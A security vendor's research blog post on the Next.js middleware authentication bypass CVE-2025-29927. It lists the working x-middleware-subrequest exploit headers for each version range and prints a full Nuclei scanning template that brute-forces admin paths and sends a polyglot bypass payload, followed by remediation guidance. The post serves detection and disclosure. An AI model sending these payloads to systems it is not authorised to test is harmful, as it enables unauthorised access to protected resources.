Next.js Middleware Bypass (CVE‑2025‑29927) Detection

Research

•

3.26.2025

•

by NightVision Security Research Team

Introduction

On March 21, 2025, a critical vulnerability in Next.js was disclosed as CVE-2025-29927, affecting versions 11.1.4 through 15.2.2. This vulnerability allows attackers to bypass middleware security controls by manipulating the x-middleware-subrequest header, potentially leading to authentication bypasses and unauthorized access to protected resources.

At NightVision, our security research team has developed a nuclei template for detecting this vulnerability using directory bruteforcing to find protected endpoints. In this post, we'll analyze the vulnerability, explain detection challenges, and demonstrate how our template works.

Understanding the Vulnerability

Next.js middleware functions as an interceptor that executes before a request reaches its destination. It's commonly used to implement:

Authentication checks
Authorization controls
Path rewrites and redirects
Security header injections

The vulnerability exists in Next.js's internal mechanism designed to prevent infinite middleware recursion loops. By manipulating the x-middleware-subrequest header, attackers can trick the middleware into thinking it's been processed already, causing it to skip crucial security checks.

Exploit Mechanics

The exploit works differently depending on the Next.js version:

Pre-v12.2: Add the header x-middleware-subrequest: pages/_middleware
Modern versions: Add x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
With src directory: Use x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

When successful, the vulnerability allows attackers to:

Bypass authentication requirements
Access protected routes and resources
Circumvent security header protections (like CSP)
Potentially trigger cache poisoning in specific configurations

Limitations of Existing Detection Methods

Based on our research and analysis of other Nuclei templates being considered in the Nuclei OSS community and publicly available information [2,3], we identified several limitations for CVE-2025-29927:

Incomplete exploitation techniques: Many early PoCs incorrectly suggested that x-middleware-subrequest: true was sufficient for exploitation
Limited path discovery: Existing detection methods primarily rely on parsing HTML links, which typically won't include protected/admin routes
Ineffective header detection: Some solutions don't properly check for the middleware-specific headers that indicate vulnerability
Missing the X-Nextjs-Data header: Many detection methods don't use the X-Nextjs-Data: 1 header which helps identify middleware usage

Our Detection Approach

Our nuclei template uses two main techniques to address these limitations:

1. Directory Bruteforcing for Path Discovery

To find potentially vulnerable endpoints, our template tests a list of common administrative and protected routes:

Path enumeration: We test a curated list of common paths. This approach helps discover protected resources that aren't linked from public pages. Included paths:
- Administrative paths (admin, dashboard, administrator)
- Application-specific areas (account, user, config)
- Security-sensitive locations (security, system, backup)
- API endpoints and documentation areas
Efficient testing flow: The template optimizes the scanning process by:
- First checking if middleware is in use
- Only proceeding with exploitation attempts on endpoints that show middleware activity
- This reduces scan time and server load
Status code validation: The template checks response status codes to:
- Identify middleware-controlled redirects (307 responses)
- Detect successful bypass attempts (200 responses after exploitation)

2. Two-Stage Detection Process

Our template implements a two-stage process:

Initial Middleware Detection: We identify if the application uses middleware by sending a request with the X-Nextjs-Data: 1 header and checking for specific response headers.
Vulnerability Testing: For endpoints that show middleware activity, we attempt exploitation with a polyglot payload that works across all vulnerable Next.js versions.

This approach reduces false positives and improves efficiency by focusing only on potentially vulnerable endpoints.

The Nuclei Template

Here's the complete nuclei template we've developed:

id: CVE-2025-29927

info:
  name: Next.js Middleware Bypass Detection
  author: nvsecurity
  severity: critical
  description: |
    Next.js contains a critical vulnerability affecting versions 11.1.4 through 15.2.2.
    The vulnerability allows attackers to bypass middleware security controls by sending a specially crafted
    'x-middleware-subrequest' header, which can lead to authorization bypass and other security control circumvention.
    
    This template uses directory bruteforcing to discover protected endpoints that might be vulnerable
    to this attack. It implements a two-stage approach that first identifies middleware usage
    and then attempts exploitation.
  reference:
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
    - https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
    - https://slcyber.io/assetnote-security-research-center/doing-the-due-diligence-analysing-the-next-js-middleware-bypass-cve-2025-29927/
  remediation: |
    Upgrade to Next.js 14.2.25 or 15.2.3 or later.
    If upgrading is not possible, block the x-middleware-subrequest header at the WAF or server level.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cwe-id: CWE-287
  metadata:
    max-request: 2
    shodan-query: x-middleware-rewrite
    fofa-query: x-middleware-rewrite
    product: next.js
    vendor: zeit
  tags: cve,cve2025,nextjs,middleware,auth-bypass,nightvision


flow: |
    const paths = [
      "",
      "admin",
      "dashboard",
      "administrator",
      "account",
      "next-admin",
      "admin/dashboard",
      "user", 
      "test", 
      "user/dashboard"
    ]
    for (let path of iterate(paths)) {
      set("path", path);
      http(1) && http(2);
    }

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}"
    headers:
      X-Nextjs-Data: 1

    matchers:
      - type: dsl
        dsl:
          - contains_any(to_lower(header), 'x-nextjs-redirect', 'x-middleware-rewrite', 'x-nextjs-rewrite', 'x-middleware-next') && status_code == 307
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{path}}"
    headers:
      X-Middleware-Subrequest: "src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200

Benefits of This Approach

This template offers several practical benefits:

Better path discovery: By testing common protected paths, the template can find endpoints that other methods might miss.
Reduced false positives: The two-stage approach ensures we only test applications that actually use middleware.
Version compatibility: The payload works across all vulnerable Next.js versions.
Efficient scanning: The template optimizes scanning performance by only attempting exploitation on endpoints that show middleware activity.

Testing Results

When testing this template on web applications, we observed:

Effective detection: The template successfully detected vulnerable endpoints on multiple Next.js applications.
Reduced false alarms: The two-stage approach significantly reduced false positives compared to single-stage methods.
Comprehensive coverage: The template worked consistently across different Next.js versions and configurations.

Mitigation and Remediation

If you identify vulnerable Next.js applications in your environment:

Update immediately:
- Next.js 12.x: Update to ≥ 12.3.5
- Next.js 13.x: Update to ≥ 13.5.9
- Next.js 14.x: Update to ≥ 14.2.25
- Next.js 15.x: Update to ≥ 15.2.3
If immediate updates aren't possible:
- Block the x-middleware-subrequest header at your WAF or reverse proxy
- For Nginx: proxy_set_header x-middleware-subrequest "";
- For Apache: RequestHeader unset x-middleware-subrequest
Implement defense-in-depth:
- Add secondary authentication checks within API endpoints
- Consider implementing additional API gateway controls

Conclusion

The Next.js middleware bypass vulnerability (CVE-2025-29927) represents a significant risk for organizations using this popular framework. Our nuclei template provides a practical way to identify vulnerable applications by combining directory bruteforcing with a two-stage detection process.

At NightVision, we provide tools like this template to help our customers identify security vulnerabilities in their web applications. This template is now available through the NightVision platform.

For more information on how NightVision can help secure your web applications against vulnerabilities like CVE-2025-29927, visit nightvision.net or contact our security team.